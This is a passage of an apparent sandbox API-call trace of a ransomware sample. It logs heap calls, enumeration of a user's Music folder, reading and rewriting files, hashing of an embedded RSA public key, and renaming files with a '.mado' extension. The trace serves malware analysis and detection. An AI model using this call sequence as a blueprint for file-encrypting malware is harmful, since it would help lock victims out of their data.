lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe388 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe358 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe340 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b683c0 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b68078 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe340 | out: hHeap=0x2c0000) returned 1 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.567] GetCurrentThreadId () returned 0x600 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71d80 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.567] GetCurrentThreadId () returned 0x600 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe388 [0204.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe340 [0204.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe328 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3a0 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3b8 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe340 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe340 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b683c0 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3b8 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b68190 [0204.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b682a8 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe340 | out: hHeap=0x2c0000) returned 1 [0204.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe370 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3a0 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe328 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80930 | out: hHeap=0x2c0000) returned 1 [0204.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.571] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10579, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.571] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.571] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.571] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.571] CloseHandle (hObject=0x63c) returned 1 [0204.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.573] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\O7D12rpnDK7.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\o7d12rpndk7.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\O7D12rpnDK7.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\o7d12rpndk7.wav.mado")) returned 1 [0204.574] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb23eb0, ftCreationTime.dwHighDateTime=0x1d5debe, ftLastAccessTime.dwLowDateTime=0x42f53f10, ftLastAccessTime.dwHighDateTime=0x1d5e52f, ftLastWriteTime.dwLowDateTime=0x42f53f10, ftLastWriteTime.dwHighDateTime=0x1d5e52f, nFileSizeHigh=0x0, nFileSizeLow=0xcd0c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="odacb09i75Hk.m4a", cAlternateFileName="ODACB0~1.M4A")) returned 1 [0204.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.574] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\odacb09i75Hk.m4a") returned=".m4a" [0204.574] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\odacb09i75Hk.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\odacb09i75hk.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.574] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=52492) returned 1 [0204.574] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.577] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xcce6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.577] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.579] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xcd0c, lpOverlapped=0x0) returned 1 [0204.579] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.579] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.579] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.579] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.580] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.580] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.580] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.580] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.580] GetLastError () returned 0x0 [0204.581] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.581] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.581] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.581] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.581] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xcd10) returned 0x3b81690 [0204.581] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80930 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80978 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe328 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3a0 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6bb80 [0204.582] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe370 | out: hHeap=0x2c0000) returned 1 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3a0 | out: hHeap=0x2c0000) returned 1 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3a0 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe370 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe358 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b68078 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b68190 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe370 | out: hHeap=0x2c0000) returned 1 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 